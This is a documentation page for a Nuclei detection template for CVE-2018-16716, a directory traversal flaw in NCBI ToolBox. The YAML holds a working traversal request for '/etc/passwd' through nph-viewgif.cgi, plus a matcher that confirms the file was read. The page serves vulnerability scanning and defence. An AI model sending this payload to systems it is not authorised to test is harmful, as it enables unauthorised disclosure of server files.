Skip to content
Nuclei Templates

NCBI ToolBox - Directory Traversal

ID: CVE-2018-16716

Severity: critical

Author: 0x_Akoko

Tags: cve,cve2018,ncbi,lfi,nih

Description

Section titled “Description”

NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.

YAML Source

Section titled “YAML Source”
id: CVE-2018-16716


info:
  name: NCBI ToolBox - Directory Traversal
  author: 0x_Akoko
  severity: critical
  description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
  impact: |
    An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
  remediation: |
    Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox.
  reference:
    - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16716
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/grymer/CVE
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2018-16716
    cwe-id: CWE-22
    epss-score: 0.0045
    epss-percentile: 0.75058
    cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nih
    product: ncbi_toolbox
  tags: cve,cve2018,ncbi,lfi,nih


http:
  - method: GET
    path:
      - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"


    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e263375bad37512fa623e23979ee340da5f7548dffe898f126db8c70fff59dfe02210081093879e8c81c8bfbf774348282e00a50447df4cc4f4a109350b33cbce7e435:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-16716.yaml"

View on Github